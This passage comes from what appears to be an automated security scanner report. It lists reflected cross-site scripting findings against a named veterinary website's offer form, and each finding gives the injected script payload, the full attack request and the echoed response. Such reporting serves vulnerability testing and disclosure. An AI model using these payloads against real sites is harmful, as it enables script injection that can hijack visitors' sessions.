2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:56 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=kobmgoan4hgeoq1ek4db6fi2v5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=04cd11"><script>alert(1)</script>bb1f3698051&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3f
...[SNIP]...

2.33. http://www.vcahospitals.com/main/offer [optin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8827"><script>alert(1)</script>059c58f8099 was submitted in the optin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?&state=FL&optin=1f8827"><script>alert(1)</script>059c58f8099&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=1f8827"><script>alert(1)</script>059c58f8099&guid=2505B0C6-B6AA-4144-878F-54873D353284" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.34. http://www.vcahospitals.com/main/offer [other parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the other request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55d5e"><script>alert(1)</script>d09f3450d0b was submitted in the other parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=55d5e"><script>alert(1)</script>d09f3450d0b&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:31 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=6n7l65heh918gmaumh17hnsri4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
/www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=55d5e"><script>alert(1)</script>d09f3450d0b&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city
...[SNIP]...

2.35. http://www.vcahospitals.com/main/offer [petage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the petage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48342"><script>alert(1)</script>799b196a043 was submitted in the petage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=48342"><script>alert(1)</script>799b196a043&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=s9111l9njt4haqvhbc32et8al6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
hospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=48342"><script>alert(1)</script>799b196a043&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26da
...[SNIP]...

2.36. http://www.vcahospitals.com/main/offer [petname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the petname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc9d9"><script>alert(1)</script>32ff1a8fde2 was submitted in the petname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=fc9d9"><script>alert(1)</script>32ff1a8fde2&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:45 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=tltmjp59dlja7q81sha6gm0bu4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=fc9d9"><script>alert(1)</script>32ff1a8fde2&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307
...[SNIP]...

2.37. http://www.vcahospitals.com/main/offer [pettype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the pettype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48ff0"><script>alert(1)</script>c819c2cd266 was submitted in the pettype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=48ff0"><script>alert(1)</script>c819c2cd266&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:51 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=21dh1lcji1465f3ng24l2mb1q3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=48ff0"><script>alert(1)</script>c819c2cd266&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26
...[SNIP]...

2.38. http://www.vcahospitals.com/main/offer [phone parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141be"><script>alert(1)</script>908e5de26cc was submitted in the phone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

